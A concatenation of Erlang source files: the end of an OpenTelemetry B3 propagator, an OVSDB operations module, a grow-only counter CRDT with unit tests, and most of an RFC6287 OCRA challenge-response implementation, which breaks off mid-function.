% Extract trace context from the supplied carrier. The b3 single header takes
% precedence over the multi-header format.
%
% If extraction fails, the original context will be returned.
-spec extract(Context, Carrier, CarrierKeysFun, CarrierGetFun, Options) -> Context
when Context :: otel_ctx:t(),
Carrier :: otel_propagator:carrier(),
CarrierKeysFun :: otel_propagator_text_map:carrier_keys(),
CarrierGetFun :: otel_propagator_text_map:carrier_get(),
Options :: otel_propagator_text_map:propagator_options().
extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) ->
case otel_propagator_b3single:extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) of
Result when Result =/= undefined -> Result;
_ ->
case otel_propagator_b3multi:extract(Ctx, Carrier, CarrierKeysFun, CarrierGet, Options) of
Result when Result =/= undefined -> Result;
_ -> Ctx
end
end. | apps/opentelemetry_api/src/otel_propagator_b3.erl | 0.796767 | 0.536556 | otel_propagator_b3.erl | starcoder |
%%-------------------------------------------------------------------
%% Copyright (c) 2020 <NAME> <EMAIL>
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at:
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%%
%% @author <NAME>
%% @doc OVSDB Database manipulation methods
%%
%% @end
%% Created : 16. Jun 2020 7:39 AM
%%-------------------------------------------------------------------
-module(ovsdb_ops).
-author("<NAME>").
-include("ovsdb_client.hrl").
%% API
-export([
insert/2, insert/3,
select/3,
update/3,
mutate/3,
delete/2,
wait/4, wait/5,
commit/1,
abort/0,
comment/1,
assert/1
]).
insert(Table, Row) ->
#{op => insert, table => Table, row => Row}.
insert(Table, Row, Id) ->
maps:merge(insert(Table, Row), #{<<"uuid-name">> => Id}).
select("*", Table, Conditions) ->
#{op => select, table => Table,
where => conditions(Conditions)};
select(Columns, Table, Conditions) ->
#{op => select, table => Table,
where => conditions(Conditions), columns => Columns}.
update(Table, Conditions, Row) ->
#{op => update, table => Table,
where => conditions(Conditions), row => Row}.
mutate(Table, Conditions, Mutations) ->
#{op => mutate, table => Table,
where => conditions(Conditions),
mutations => conditions(Mutations)}.
delete(Table, Conditions) ->
#{op => delete, table => Table, where => conditions(Conditions)}.
wait(Table, Conditions, Rows, Until) ->
wait(Table, Conditions, Rows, Until, []).
wait(Table, Conditions, Rows, Until, Columns) ->
#{op => wait, timeout => 10, table => Table,
where => conditions(Conditions),
columns => Columns, until => Until, rows => Rows}.
commit(Mode) ->
#{op => commit, durable => Mode}.
abort() ->
#{op => abort}.
comment(Comment) ->
#{op => comment, comment => Comment}.
assert(Lock) ->
#{op => assert, lock => Lock}.
%%%===================================================================
%%% Helpers
%%%===================================================================
conditions(Conditions) ->
lists:foldl(fun
({C, F, V}, Acc) ->
[[ovsdb_utils:to_binstring(C),
ovsdb_utils:to_binstring(F),
V] | Acc];
(#ovsdb_condition{column = C, function = F, value = V}, Acc) ->
[[ovsdb_utils:to_binstring(C),
ovsdb_utils:to_binstring(F),
V] | Acc]
end, [], Conditions). | src/ovsdb_ops.erl | 0.50952 | 0.404919 | ovsdb_ops.erl | starcoder |
%% -------------------------------------------------------------------
%%
%% riak_dt_gcounter: A state based, grow only, convergent counter
%%
%% Copyright (c) 2007-2012 Basho Technologies, Inc. All Rights Reserved.
%%
%% This file is provided to you under the Apache License,
%% Version 2.0 (the "License"); you may not use this file
%% except in compliance with the License. You may obtain
%% a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing,
%% software distributed under the License is distributed on an
%% "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
%% KIND, either express or implied. See the License for the
%% specific language governing permissions and limitations
%% under the License.
%%
%% -------------------------------------------------------------------
%%% @doc
%%% a G-Counter CRDT, borrows liberally from argv0 and <NAME>'s vclock module
%%% @end
-module(riak_dt_gcounter).
-behaviour(riak_dt).
-export([new/0, value/1, update/3, merge/2, equal/2]).
-ifdef(EQC).
-include_lib("eqc/include/eqc.hrl").
-export([gen_op/0, update_expected/3, eqc_state_value/1]).
-endif.
-ifdef(TEST).
-include_lib("eunit/include/eunit.hrl").
-endif.
%% EQC generator
-ifdef(EQC).
gen_op() ->
oneof([increment, {increment, gen_pos()}]).
gen_pos()->
?LET(X, int(), 1+abs(X)).
update_expected(_ID, increment, Prev) ->
Prev+1;
update_expected(_ID, {increment, By}, Prev) ->
Prev+By;
update_expected(_ID, _Op, Prev) ->
Prev.
eqc_state_value(S) ->
S.
-endif.
new() ->
[].
value(GCnt) ->
lists:sum([ Cnt || {_Act, Cnt} <- GCnt]).
update(increment, Actor, GCnt) ->
increment_by(1, Actor, GCnt);
update({increment, Amount}, Actor, GCnt) when is_integer(Amount), Amount > 0 ->
increment_by(Amount, Actor, GCnt).
merge(GCnt1, GCnt2) ->
merge(GCnt1, GCnt2, []).
merge([], [], Acc) ->
lists:reverse(Acc);
merge(LeftOver, [], Acc) ->
lists:reverse(Acc, LeftOver);
merge([], LeftOver, Acc) ->
lists:reverse(Acc, LeftOver);
merge([{Actor1, Cnt1}=AC1|Rest], Clock2, Acc) ->
case lists:keytake(Actor1, 1, Clock2) of
{value, {Actor1, Cnt2}, RestOfClock2} ->
merge(Rest, RestOfClock2, [{Actor1, max(Cnt1, Cnt2)}|Acc]);
false ->
merge(Rest, Clock2, [AC1|Acc])
end.
equal(VA,VB) ->
lists:sort(VA) =:= lists:sort(VB).
%% priv
increment_by(Amount, Actor, GCnt) when is_integer(Amount), Amount > 0 ->
{Ctr, NewGCnt} = case lists:keytake(Actor, 1, GCnt) of
false ->
{Amount, GCnt};
{value, {_N, C}, ModGCnt} ->
{C + Amount, ModGCnt}
end,
[{Actor, Ctr}|NewGCnt].
%% ===================================================================
%% EUnit tests
%% ===================================================================
-ifdef(TEST).
-ifdef(EQC).
%% Run the shared statem model: concurrent replicas must converge.
eqc_value_test_() ->
    {timeout, 120, [?_assert(crdt_statem_eqc:prop_converge(0, 1000, ?MODULE))]}.
-endif.
%% A fresh counter is the empty list.
new_test() ->
    ?assertEqual([], new()).
%% value/1 sums all per-actor counts; an empty counter reads 0.
value_test() ->
    GC1 = [{1, 1}, {2, 13}, {3, 1}],
    GC2 = [],
    ?assertEqual(15, value(GC1)),
    ?assertEqual(0, value(GC2)).
%% Repeated increments accumulate per actor.
update_increment_test() ->
    GC0 = new(),
    GC1 = update(increment, 1, GC0),
    GC2 = update(increment, 2, GC1),
    GC3 = update(increment, 1, GC2),
    ?assertEqual([{1, 2}, {2, 1}], GC3).
%% {increment, N} adds N in a single step.
update_increment_by_test() ->
    GC0 = new(),
    GC = update({increment, 7}, 1, GC0),
    ?assertEqual([{1, 7}], GC).
%% Merging unions the actor sets and keeps the per-actor maximum.
merge_test() ->
    GC1 = [{<<"1">>, 1},
           {<<"2">>, 2},
           {<<"4">>, 4}],
    GC2 = [{<<"3">>, 3},
           {<<"4">>, 3}],
    ?assertEqual([], merge(new(), new())),
    ?assertEqual([{<<"1">>,1},{<<"2">>,2},{<<"3">>,3},{<<"4">>,4}],
                 lists:sort( merge(GC1, GC2))).
%% Left-over entries from the shorter side survive the merge.
merge_less_left_test() ->
    GC1 = [{<<"5">>, 5}],
    GC2 = [{<<"6">>, 6}, {<<"7">>, 7}],
    ?assertEqual([{<<"5">>, 5},{<<"6">>,6}, {<<"7">>, 7}],
                 merge(GC1, GC2)).
merge_less_right_test() ->
    GC1 = [{<<"6">>, 6}, {<<"7">>,7}],
    GC2 = [{<<"5">>, 5}],
    ?assertEqual([{<<"5">>,5},{<<"6">>,6}, {<<"7">>, 7}],
                 lists:sort( merge(GC1, GC2)) ).
%% When both sides know an actor, the larger count wins.
merge_same_id_test() ->
    GC1 = [{<<"1">>, 2},{<<"2">>,4}],
    GC2 = [{<<"1">>, 3},{<<"3">>,5}],
    ?assertEqual([{<<"1">>, 3},{<<"2">>,4},{<<"3">>,5}],
                 lists:sort( merge(GC1, GC2)) ).
%% Equality is order-insensitive but value-sensitive.
equal_test() ->
    GC1 = [{1, 2}, {2, 1}, {4, 1}],
    GC2 = [{1, 1}, {2, 4}, {3, 1}],
    GC3 = [{1, 2}, {2, 1}, {4, 1}],
    GC4 = [{4, 1}, {1, 2}, {2, 1}],
    ?assertNot(equal(GC1, GC2)),
    ?assert(equal(GC1, GC3)),
    ?assert(equal(GC1, GC4)).
%% End-to-end: independent replicas update, merge and converge.
usage_test() ->
    GC1 = new(),
    GC2 = new(),
    ?assert(equal(GC1, GC2)),
    GC1_1 = update({increment, 2}, a1, GC1),
    GC2_1 = update(increment, a2, GC2),
    GC3 = merge(GC1_1, GC2_1),
    GC2_2 = update({increment, 3}, a3, GC2_1),
    GC3_1 = update(increment, a4, GC3),
    GC3_2 = update(increment, a1, GC3_1),
    ?assertEqual([{a1, 3}, {a2, 1}, {a3, 3}, {a4, 1}],
                 lists:sort(merge(GC3_2, GC2_2))).
-endif.
%%% @author <NAME> <<EMAIL>>
%%% @reference <a href="http://tools.ietf.org/html/rfc6287">RFC6287</a>
%%% @reference <a href="http://www.rfc-editor.org/errata_search.php?eid=3729">
%%% RFC Errata ID: 3729</a>
%%% @doc RFC6287 OCRA (OATH Challenge-Response Algorithm)
%%%
%%% given
%%% ```Suite = <<"OCRA-1:HOTP-SHA1-6:C-QN08-PSHA1">>.'''
%%%
%%% challenge `Q' for `Suite':
%%% ```{ok, Q} = rfc6287:challenge(Suite).'''
%%%
%%% generate `OCRA' for key `K', challenge `Q', counter `C=23' and
%%% Pin `<<"1234">>':
%%%
%%% ```
%%% Pin = <<"1234">>,
%%% K = <<"<KEY>">>,
%%% DI_client = #{suite => Suite, q => Q, c => 23, p => {pin, Pin}},
%%% {ok, OCRA} = rfc6287:generate(K, DI_client). '''
%%%
%%% verify `OCRA' for key `K', challenge `Q' and `PinHash' using
%%% `C=20' as staring counter and a counter_window of `10'
%%% ```
%%% PinHash = crypto:sha(Pin),
%%% DI_server = #{suite => Suite, q => Q, c => 20, p => PinHash},
%%% {ok, NextCounter} = rfc6287:verify(K, DI_server, OCRA, #{cw => 10}).
%%% '''
%%%
%%% `NextCounter' is `24'
%%%
-module(rfc6287).
-type suite() :: binary().
%% `OCRASuite' string
-type counter() :: 0..16#ffffffffffffffff.
%% DataInput parameter `C'
-type challenge() :: binary().
%% OCRA challenge string, output of {@link challenge/1.}
%% DataInput parameter `Q'
-type pin_hash() :: <<_:_*20>> | <<_:_*32>> | <<_:_*64>>.
%% DataInput parameter `P'
-type session_info() :: binary().
%% DataInput parameter `S'
-type timestep() :: <<_:_*8>>.
%% DataInput parameter `T'
-type ocra() :: binary().
%% OCRA result, output of {@link generate/2.}
-type key() :: <<_:_*20>> | <<_:_*32>> | <<_:_*40>> | <<_:_*64>> | <<_:_*128>>.
%% `K', either hexadecimal binary string or binary.
-type counter_window() :: pos_integer().
-type timestep_window() :: pos_integer().
-type data_input() :: #{suite := suite()
,c => counter()
,q := challenge()
,p => {pin, binary()} | pin_hash()
,s => session_info()
,t => timestep() | calc}.
-type dgst() :: sha | sha256 | sha512.
-type data_input_parsed() ::
[{c} |
{q, $A | $N | $H, 4..64} |
{p, dgst()} |
{s, 0..999} |
{t, pos_integer()}].
-export_type([suite/0, challenge/0, counter/0, pin_hash/0, ocra/0, key/0,
session_info/0, timestep/0, data_input/0]).
-export_type([timestep_window/0, counter_window/0]).
%% API exports
-export([challenge/1, generate/2, verify/4]).
%%====================================================================
%% API functions
%%====================================================================
%% @doc
%% Create random challenge() with format and length as specified in
%% `OCRASuite'.
%% @returns <dl>
%% <dt>`{ok, challenge()}'</dt>
%% <dt>`{error, invalid_suite}' if `OCRASuite'
%% is not a valid suite</dt>
%% </dl>
-spec challenge(OCRASuite :: suite()) ->
{ok, Q :: challenge()} | {error, invalid_suite}.
challenge(Suite) ->
    Maybe = parse(Suite),
    challenge1(Maybe).
%% A suite that fails to parse cannot produce a challenge.
challenge1(false) -> {error, invalid_suite};
challenge1({_, DIP}) ->
    %% The Q descriptor carries the challenge format (F) and length (XX).
    {_, F, XX} = lists:keyfind(q, 1, DIP),
    Bin = crypto:strong_rand_bytes(XX),
    {ok, challenge2(F, Bin)}.
%% Map random bytes onto the requested alphabet:
%% $A -> printable ASCII, $N -> decimal digits, $H -> hex digits.
%% NOTE(review): for $A/$N, `rem` introduces a slight modulo bias;
%% for odd XX the $H clause yields XX-1 hex chars — verify against RFC.
challenge2($A, B) -> << <<(X rem 93 + $!)>> || <<X>> <= B >>;
challenge2($N, B) -> << <<(X rem 10 + $0)>> || <<X>> <= B >>;
challenge2($H, B) -> bin2hex(binary:part(B, 0, size(B) div 2)).
%% @doc
%% Generate `OCRA(K, {[C] | Q | [P | S | T]})'.
%% @returns <dl>
%% <dt>`{ok, ocra()}'</dt>
%% <dt>`{error, invalid_suite}' if suite in `DataInput' is
%% not a valid OCRA suite</dt>
%% <dt>`{error, invalid_key}' if `K' is not of the size
%% required by suite in `DataInput' or if `K' is twice the size
%% required by suite and but not a hex string.</dt>
%% <dt>`{error, invalid_data_input}' if DataInput is missing keys,
%% has to many keys or values not conforming to suite</dt>
%% </dl>
-spec generate(K :: key(), data_input()) ->
{ok, ocra()} |
{error,
invalid_suite | invalid_key | invalid_data_input}.
%% Staged pipeline: parse suite -> check key -> build DataInput -> HMAC.
%% Each stage returns false on failure, which the next stage maps to a
%% descriptive error tuple.
%% NOTE(review): crypto:hmac/3 was removed in OTP 24; newer OTP needs
%% crypto:mac(hmac, Alg, Key, Data) instead.
generate(K, #{suite := Suite} = DataInput) ->
    Maybe = parse(Suite),
    generate1(Maybe, {K, DataInput}).
generate1(false, _) -> {error, invalid_suite};
generate1({{Alg, _Truncation}, _DI} = Parsed, {K, DataInput}) ->
    %% Key length must match the suite's digest size (hex keys allowed).
    Maybe = fmt_key(dgst_sz(Alg), K),
    generate2(Maybe, {Parsed, DataInput}).
generate2(false, _) -> {error, invalid_key};
generate2(Key, {{{Alg, Truncation}, DIP}, DataInput}) ->
    %% Serialize DataInput according to the parsed suite description.
    Maybe = data(DIP, DataInput),
    generate3(Maybe, {Key, Alg, Truncation}).
generate3(false, _) -> {error, invalid_data_input};
generate3(Data, {Key, Alg, Truncation}) ->
    %% OCRA = Truncate(HMAC(K, DataInput)).
    Bin = crypto:hmac(Alg, Key, Data),
    {ok, truncate(Truncation, Bin)}.
%% @doc
%% Verify `OCRA' response.
%% @returns <dl>
%% <dt>`ok' - success</dt>
%% <dt>`{ok, NextCounter :: counter()}' - success, suite specified
%% a `C' parameter</dt>
%% <dt>`{error, failed}' - failure to verify `OCRA'</dt>
%% <dt>`{error, invalid_suite}' if suite in `DataInput' is
%% not a valid OCRA suite</dt>
%% <dt>`{error, invalid_key}' if `K' is not of the size
%% required by suite in `DataInput' or if `K' is twice the size
%% required by suite and but not a hex string.</dt>
%% <dt>`{error, invalid_data_input}' if DataInput is missing keys,
%% has to many keys or values not conforming to suite</dt>
%% <dt>`{error, invalid_parameters}' if `VerifyParams' is not
%% consistent (e.g. suite has `T' DataInput parameter, but
%% `VerifyParams' has no `tw' key)</dt>
%% </dl>
-spec verify(key(), data_input(), ocra(),
#{cw => counter_window() ,tw => timestep_window()}) ->
ok | {ok, New_Counter :: counter()} |
{error, failed} |
{error, invalid_suite | invalid_key | invalid_parameters}.
%% Verification pipeline mirrors generate/2, then dispatches on the
%% normalized window options returned by vpar/2.
verify(K, #{suite := Suite} = DataInput, OCRA, VerifyParams) ->
    Maybe = parse(Suite),
    verify1(Maybe, {K, DataInput, OCRA, VerifyParams}).
verify1(false, _) -> {error, invalid_suite};
verify1({_, DIP} = Parsed, {K, DataInput, OCRA, VerifyParams}) ->
    %% Check the cw/tw window options against the suite's C/T parameters.
    Maybe = vpar(DIP, VerifyParams),
    verify2(Maybe, {Parsed, K, DataInput, OCRA}).
verify2(false, _) -> {error, invalid_parameters};
verify2(Vpar, {Parsed, K, DataInput, OCRA}) ->
    {{Alg, _Truncation}, _DIP} = Parsed,
    Maybe = fmt_key(dgst_sz(Alg), K),
    verify3(Maybe, {Parsed, DataInput, OCRA, Vpar}).
verify3(false, _) -> {error, invalid_key};
verify3(K, {Parsed, DataInput, OCRA, Vpar}) ->
    {{_Alg, _Truncation}, DIP} = Parsed,
    Maybe = data(DIP, DataInput),
    verify4(Maybe, {K, Parsed, DataInput, OCRA}, Vpar).
verify4(false, _, _) -> {error, invalid_data_input};
verify4(Data, {K, {_, DIP} = Parsed, #{t := calc} = DataInput0, OCRA}, Vpar) ->
    %% Pin 't' to the current timestep so window retries all reuse the
    %% same instant instead of recomputing the clock per attempt.
    {t, V} = lists:keyfind(t, 1, DIP),
    DataInput = DataInput0#{t => fmt_ts(V)},
    verify5(Data, {K, Parsed, DataInput, OCRA}, Vpar);
verify4(Data, Y, Vpar) -> verify5(Data, Y, Vpar).
%% No windows: a single comparison.
verify5(Data, {K, {{Alg, Truncation}, _DIP}, _, OCRA}, []) ->
    Bin0 = crypto:hmac(Alg, K, Data),
    Bin = truncate(Truncation, Bin0),
    verify_equal(Bin, OCRA);
%% Counter window only.
verify5(Data, {K, Parsed, _, OCRA} = Y, [{cw, CW}]) ->
    Maybe = ver_check({K, Parsed, Data, OCRA}),
    ver_cw(Maybe, Y, CW);
%% Timestep window only.
verify5(Data, {K, Parsed, _, OCRA} = Y, [{tw, TW}]) ->
    Maybe = ver_check({K, Parsed, Data, OCRA}),
    ver_tw(Maybe, Y, TW, 1);
%% Both windows: scan counters at each candidate timestep.
verify5(Data, {K, Parsed, _, OCRA} = Y, [{tw, TW}, {cw, CW}]) ->
    Maybe = ver_check({K, Parsed, Data, OCRA}),
    ver_tw_cw(ver_cw(Maybe, Y, CW), Y, CW, TW, 1).
%%====================================================================
%% Internal functions
%%====================================================================
%% Recompute the OCRA for one candidate DataInput and compare.
%% First clause takes pre-serialized Data; second serializes first.
ver_check({K, {{Alg, Truncation}, _}, Data, OCRA}) when is_binary(Data) ->
    OCRA == truncate(Truncation, crypto:hmac(Alg, K, Data));
ver_check({K, {_, DIP} = Parsed, DataInput, OCRA}) ->
    Data = data(DIP, DataInput),
    ver_check({K, Parsed, Data, OCRA}).
%% Combined counter+timestep scan: try the counter window at T, then
%% at T-TS and T+TS, widening TS until it reaches the window TW.
ver_tw_cw({ok, NextC}, _, _, _, _) -> {ok, NextC};
ver_tw_cw({error, failed}, {K, Parsed, #{t := <<T:64>>} = DataInput, OCRA},
          CW, TW, TS) when TS < TW ->
    Past = {K, Parsed, DataInput#{t => <<(T - TS):64>>}, OCRA},
    Future = {K, Parsed, DataInput#{t => <<(T + TS):64>>}, OCRA},
    MaybeOk = ver_cw(ver_check(Past), Past, CW),
    R = ver_tw_cw1(MaybeOk, Future, CW),
    ver_tw_cw(R, {K, Parsed, DataInput, OCRA}, CW, TW, TS + 1);
ver_tw_cw(_, _, _, _, _) -> {error, failed}.
%% Only scan the future timestep if the past one failed.
ver_tw_cw1({ok, C}, _, _) -> {ok, C};
ver_tw_cw1({error, failed}, Future, CW) ->
    ver_cw(ver_check(Future), Future, CW).
%% Timestep-only scan: accept T, T-TS or T+TS for TS up to TW.
ver_tw(true, _, _, _) -> ok;
ver_tw(false, {K, Parsed, #{t := <<T:64>>} = DataInput, OCRA}, TW, TS)
  when TS < TW ->
    Past = {K, Parsed, DataInput#{t => <<(T - TS):64>>}, OCRA},
    Future = {K, Parsed, DataInput#{t => <<(T + TS):64>>}, OCRA},
    Maybe = ver_check(Past) orelse ver_check(Future),
    ver_tw(Maybe, {K, Parsed, DataInput, OCRA}, TW, TS + 1);
ver_tw(_, _, _, _) -> {error, failed}.
%% Counter-only scan: on success return the next counter (wrapping at
%% 2^64); otherwise retry with C+1 while the window allows.
ver_cw(true, {_K, _Parsed, #{c := C}, _}, _) ->
    {ok, (C + 1) band 16#ffffffffffffffff};
ver_cw(false, {K, Parsed, #{c := C} = DataInput, OCRA}, CW) when CW > 0 ->
    Next = {K, Parsed, DataInput#{c => C + 1}, OCRA},
    Maybe = ver_check(Next),
    ver_cw(Maybe, Next, CW - 1);
ver_cw(_, _, _) -> {error, failed}.
%% Exact comparison of computed vs presented OCRA.
%% NOTE(review): pattern-match equality is not constant-time; a timing
%% side channel is theoretically possible here.
verify_equal(A, A) -> ok;
verify_equal(_,_) -> {error, failed}.
-spec parse(suite()) ->
          {{dgst(), Truncation :: false | 4..10},
           data_input_parsed()} | false.
%% Parse an OCRASuite string "OCRA-1:HOTP-<Alg>-<T>:<DataInput>".
%% Returns false on any malformed component.
parse(Suite) when is_binary(Suite) ->
    parse1(string:tokens(binary_to_list(Suite), ":"));
parse(_) -> false.
parse1(["OCRA-1", C, DI]) -> parse2(string:tokens(C, "-"), DI);
parse1(_) -> false.
%% Truncation digit count: 0 means no truncation, otherwise 4..10.
parse2(["HOTP", A, T], DI) -> parse3(p_len(T, 0, 10), A, DI);
parse2(_,_) -> false.
parse3(0, A, DI) ->
    parse4(p_di(string:tokens(DI, "-")), false, A);
parse3(X, A, DI) when X > 3 ->
    parse4(p_di(string:tokens(DI, "-")), X, A);
parse3(_, _, _) -> false.
parse4(false, _, _) -> false;
parse4(DIP, Truncation, Alg) -> parse5(dgst(Alg), Truncation, DIP).
parse5(false, _, _) -> false;
parse5(Alg, Truncation, DIP) -> {{Alg, Truncation}, DIP}.
%% DataInput descriptor: optional C, mandatory Q, then optional P, S
%% and T — in exactly that order.
p_di(["C" | R]) -> p_di_q(R, [{c}]);
p_di(R) -> p_di_q(R, []).
%% Q<format><2-digit length>; format is A (alnum), N (num) or H (hex).
p_di_q([[$Q, QT | [_, _] = QLen] | R], Acc)
  when QT == $A; QT == $N; QT == $H ->
    p_di_q1(p_len(QLen, 4, 64), QT, R, Acc);
p_di_q(_,_) -> false.
p_di_q1(false, _, _, _) -> false;
p_di_q1(QL, QT, R, Acc) -> p_di_p(R, [{q, QT, QL} | Acc]).
%% P<hash alg>: pin-hash parameter.
p_di_p([[$P | Alg] | R], Acc) -> p_di_p1(dgst(Alg), R, Acc);
p_di_p(R, Acc) -> p_di_s(R, Acc).
p_di_p1(false, _, _) -> false;
p_di_p1(Alg, R, Acc) -> p_di_s(R, [{p, Alg} | Acc]).
%% S<3-digit length>: session-info parameter.
p_di_s([[$S | [_,_,_] = N] | R], Acc) -> p_di_s1(p_len(N, 0, 999), R, Acc);
p_di_s(R, Acc) -> p_di_ts(R, Acc).
p_di_s1(false, _, _) -> false;
p_di_s1(SLen, R, Acc) -> p_di_ts(R, [{s, SLen} | Acc]).
%% T<granularity>: timestep parameter; must be the last component.
p_di_ts([], Acc) -> lists:reverse(Acc);
p_di_ts([[$T| G]], Acc) -> p_di_ts1(p_di_ts2(G), Acc);
p_di_ts(_, _) -> false.
p_di_ts1(false, _) -> false;
p_di_ts1(TS, Acc) -> lists:reverse([{t, TS}| Acc]).
%% Parse the timestep granularity suffix of the T descriptor into
%% seconds. An empty suffix defaults to one minute; otherwise the
%% format is <1-2 digits><unit> with unit S (seconds, 1-59),
%% M (minutes, 1-59) or H (hours, 0-48), per RFC6287.
p_di_ts2([]) -> 60;
p_di_ts2([X, $S]) -> p_len([X], 1, 59);
p_di_ts2([X1, X2, $S]) -> p_len([X1, X2], 1, 59);
p_di_ts2([X, $M]) -> p_di_ts3(p_len([X], 1, 59), 60);
p_di_ts2([X1, X2, $M]) -> p_di_ts3(p_len([X1, X2], 1, 59), 60);
%% Bug fix: a single-digit hour count was previously treated like a
%% minute count (range 1-59, multiplier 60). Hours use range 0-48 and
%% a multiplier of 3600 seconds, matching the two-digit clause below.
p_di_ts2([X, $H]) -> p_di_ts3(p_len([X], 0, 48), 3600);
p_di_ts2([X1, X2, $H]) -> p_di_ts3(p_len([X1, X2], 0, 48), 3600);
p_di_ts2(_) -> false.
%% Multiply a parsed count by the unit size, propagating parse failure.
p_di_ts3(false,_) -> false;
p_di_ts3(X, Y) -> X * Y.
%% Parse string S as an integer and range-check it; false otherwise.
p_len(S, Min, Max) ->
    try plen1(list_to_integer(S), Min, Max) catch error:badarg -> false end.
plen1(L, Min, Max) when L >= Min, L =< Max -> L;
plen1(_,_,_) -> false.
%% HMAC output size in bytes for each supported digest.
dgst_sz(sha) -> 20;
dgst_sz(sha256) -> 32;
dgst_sz(sha512) -> 64.
%% Map the suite's algorithm name onto a crypto digest atom.
dgst("SHA1") -> sha;
dgst("SHA256") -> sha256;
dgst("SHA512") -> sha512;
dgst(_) -> false.
%% HOTP-style dynamic truncation (RFC4226 section 5.3): the low nibble
%% of the last byte selects a 4-byte window, masked to 31 bits and
%% rendered as T decimal digits.
truncate(false, Bin) -> Bin;
truncate(T, Bin) ->
    Offset = binary:last(Bin) band 16#0f,
    <<_:Offset/binary, Z:32, _/binary>> = Bin,
    truncate1(integer_to_binary(Z band 16#7fffffff), T).
%% Left-pad with zeros up to T digits, or keep only the last T digits
%% (i.e. the value modulo 10^T).
truncate1(B, T) when size(B) < T ->
    list_to_binary([lists:duplicate(T - size(B), $0), B]);
truncate1(B, T) when size(B) > T -> binary:part(B, size(B) - T, T);
truncate1(B, _) -> B.
%% Ensure the key matches the digest size from the parsed suite;
%% a key of exactly twice the size is interpreted as hex-encoded.
fmt_key(Sz, K) when is_binary(K), size(K) == Sz -> K;
fmt_key(Sz, K) when is_binary(K), Sz * 2 == size(K) ->
    try hex2bin(K) catch error:badarg -> false end;
fmt_key(_, _) -> false.
%% Build the DataInput binary <Suite> 0x00 [C] Q [P] [S] [T], consuming
%% the user map in the order dictated by the parsed suite; false if the
%% map has missing, extra or ill-typed entries.
data(DIP, #{suite := Suite} = DataInput) ->
    L = maps:to_list(maps:remove(suite, DataInput)),
    data1(DIP, L, [0, Suite]).
%% Both the descriptor list and the user-supplied entries must be
%% exhausted together, so extra map keys also yield false.
data1([],[], Acc) -> list_to_binary(lists:reverse(Acc));
data1([V|R], L0, Acc) ->
    MaybeL = lists:keytake(element(1,V), 1, L0),
    fmt(MaybeL, V, R, Acc);
data1(_,_,_) -> false.
fmt(false, _, _, _) -> false;
fmt({value, {_, A}, L}, V, R, Acc) ->
    fmt2(fmt1(V, A), R, L, Acc).
%% Encode one DataInput component; false if it fails validation.
fmt1({c}, C) when is_integer(C), C >= 0, C < 1 bsl 64 -> <<C:64>>;
fmt1({q, $A, _}, B) when is_binary(B) ->
    fmt_pad(B);
%% Hex and numeric challenges are re-encoded to bytes before padding.
fmt1({q, $H, _}, B0) when is_binary(B0) ->
    try fmt_pad(hex2bin(B0))
    catch error:badarg -> false end;
fmt1({q, $N, _}, B0) when is_binary(B0) ->
    try fmt_pad(dec2bin(binary_to_list(B0)))
    catch error:badarg -> false end;
%% P: either a pre-computed pin hash of the right size, or a raw pin
%% that is hashed here.
fmt1({p, Alg}, B) when is_binary(B) ->
    dgst_sz(Alg) == size(B) andalso B;
fmt1({p, Alg}, {pin, B}) when is_binary(B) -> crypto:hash(Alg, B);
fmt1({s, SLen}, B) when is_binary(B), size(B) == SLen -> B;
fmt1({t, _}, B) when is_binary(B), size(B) == 8 -> B;
fmt1({t, V}, calc) -> fmt_ts(V);
fmt1(_,_) -> false.
fmt2(false,_,_,_) -> false;
fmt2(F, R, L, Acc) -> data1(R, L, [F | Acc]).
%% Challenges are zero-padded to a fixed 128-byte field.
fmt_pad(B) -> Pad = 128 - size(B), Pad >= 0 andalso <<B/binary, 0:(Pad * 8)>>.
%% Render a binary as uppercase hex digits, one character per nibble.
bin2hex(Bin) ->
    << <<(nibble_to_hex(N))>> || <<N:4>> <= Bin >>.
nibble_to_hex(N) when N < 10 -> $0 + N;
nibble_to_hex(N) -> $A + N - 10.
%% Decode a hex string (either case) back into bytes; fails with
%% badarg on non-hex characters.
hex2bin(Hex) ->
    << <<(binary_to_integer(<<Hi, Lo>>, 16))>> || <<Hi:8, Lo:8>> <= Hex >>.
%% Encode a decimal digit string as the byte form of its hex expansion,
%% right-padding with a zero nibble when the expansion has odd length.
dec2bin(Digits) ->
    dec2bin1(integer_to_list(list_to_integer(Digits), 16)).
dec2bin1(HexDigits) when length(HexDigits) rem 2 == 0 ->
    hex2bin(list_to_binary(HexDigits));
dec2bin1(HexDigits) ->
    hex2bin(list_to_binary([HexDigits, $0])).
%% Current timestamp as a big-endian 64-bit count of Step-second
%% intervals. RFC6287 defines T as the number of time-steps since
%% midnight UTC on 1970-01-01 (the Unix epoch), so the Gregorian
%% second count must be rebased onto the epoch. Previously the raw
%% Gregorian count (epoch year 0) was used, which breaks
%% interoperability with other OCRA implementations.
fmt_ts(Step) ->
    M = calendar,
    Epoch = M:datetime_to_gregorian_seconds({{1970, 1, 1}, {0, 0, 0}}),
    Seconds = M:datetime_to_gregorian_seconds(M:universal_time()) - Epoch,
    <<(Seconds div Step):64>>.
%% Check VerifyParams against the parsed suite: a counter window (cw)
%% is only legal when the suite has a C parameter, a timestep window
%% (tw) only when it has a T parameter, and no extra map keys are
%% tolerated. Returns the normalized window list ({tw,_} before
%% {cw,_}) on success, false otherwise.
vpar(DI, #{cw := CW, tw := TW} = M)
  when is_integer(CW), CW > 0, is_integer(TW), TW > 0 ->
    case maps:size(M) == 2 andalso has_c(DI) andalso has_t(DI) of
        true -> [{tw, TW}, {cw, CW}];
        false -> false
    end;
vpar(DI, #{cw := CW} = M) when is_integer(CW), CW > 0 ->
    case maps:size(M) == 1 andalso has_c(DI) andalso not has_t(DI) of
        true -> [{cw, CW}];
        false -> false
    end;
vpar(DI, #{tw := TW} = M) when is_integer(TW), TW > 0 ->
    case maps:size(M) == 1 andalso has_t(DI) andalso not has_c(DI) of
